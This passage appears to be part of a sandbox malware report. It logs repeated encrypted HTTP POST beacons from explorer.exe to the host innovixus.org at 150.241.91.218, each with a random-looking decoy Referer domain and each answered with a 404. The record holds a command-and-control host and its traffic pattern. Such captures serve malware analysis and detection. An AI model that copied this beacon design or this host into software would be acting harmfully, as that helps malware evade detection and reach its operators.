                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:24 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              135192.168.11.2049889150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:25.103290081 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ltllrakeboot.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:25.103290081 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:25.362560034 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:25 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              136192.168.11.2049890150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:25.564313889 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://tcfvtukejfen.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:25.564313889 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:25.815215111 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:25 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              137192.168.11.2049891150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:26.014565945 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ajaalkfuiftr.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:26.014565945 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:26.272950888 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:26 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              138192.168.11.2049892150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:26.480114937 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://qrusgqdgonbnynq.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:26.480160952 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:26.736160994 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:26 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              139192.168.11.2049893150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:26.938512087 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://sidyipunync.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:26.938512087 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:27.198256969 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:27 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              140192.168.11.2049894150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:27.400369883 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://uqajxgeleuucw.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:27.400369883 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:27.654961109 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:27 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              141192.168.11.2049895150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:27.857517958 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://numgvbyddnvpa.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:27.857517958 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:28.114957094 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:28 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              142192.168.11.2049896150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:28.318484068 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://uaotrghvtvxpjuxh.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:28.318484068 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:28.572886944 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:28 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              143192.168.11.2049897150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:28.775435925 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://fiqheefpvhotjda.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:28.775437117 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:29.127257109 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:29 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              144192.168.11.2049898150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:29.343123913 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://pcrrlgnbyoceujpy.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:29.343123913 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:29.598162889 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:29 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              145192.168.11.2049899150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:29.798177004 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://btqruyrnfvru.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:29.798177004 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:30.050446033 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:29 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              146192.168.11.2049900150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:30.251080990 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://flftbxkuynou.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:30.251080990 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:30.505938053 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:30 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              147192.168.11.2049901150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:30.710051060 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://jcyienxenicgcen.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:30.710051060 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:30.966732025 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:30 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              148192.168.11.2049902150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:36:31.170083046 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://oqxpkdxgvxwhbsil.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:36:31.170083046 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:36:31.429008961 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:36:31 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              149192.168.11.2049903150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
